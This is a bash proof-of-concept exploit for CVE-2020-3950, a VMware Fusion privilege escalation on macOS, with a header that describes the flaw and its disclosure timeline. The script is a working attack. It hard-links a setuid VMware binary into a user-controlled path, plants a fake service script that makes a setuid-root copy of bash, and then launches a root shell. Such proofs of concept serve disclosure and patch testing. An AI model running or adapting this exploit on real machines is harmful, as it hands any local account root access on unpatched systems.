#!/bin/bash
# Description: PoC for CVE-2020-3950
# Author: Rich Mirch @0xm1rch
# Advisory: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
#
# Title
#
# VMware Fusion Elevation Of Privilege Vulnerability
#
#
# Description
#
# VMware Fusion 11.5.1 and prior are vulnerable to an elevation of privilege
# vulnerability. "VMware USB Arbitrator Service" and "Open VMware Fusion Services"
# are both setuid root binaries located at
# /Applications/VMware Fusion.app/Contents/Library/services. When executed
# outside of the standard path the binaries can be tricked into executing
# a program from a path that the attacker controls. This is achieved by
# created a hard link to the original binary. The binaries use part of the
# attacker-controlled path when executing the service and does not correctly
# validate that the target binary is legit.
#
#
# Impact
#
# A local attacker with a standard account can execute arbitrary code
# as root.
#
#
# Test Environment
#
# macOS 10.14.6
# VMware Fusion Professional Version 11.5.1 (15018442)
#
#
# Timeline
#
# 2019-12-23 Reported to vendor
# 2020-03-12 Patch released
# 2020-03-17 Advisory updated to include CVE-2020-3950

echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"

mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services

cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF

chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service

cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait

echo "Sleeping for 7 seconds"
sleep 7

$HOME/.woot -p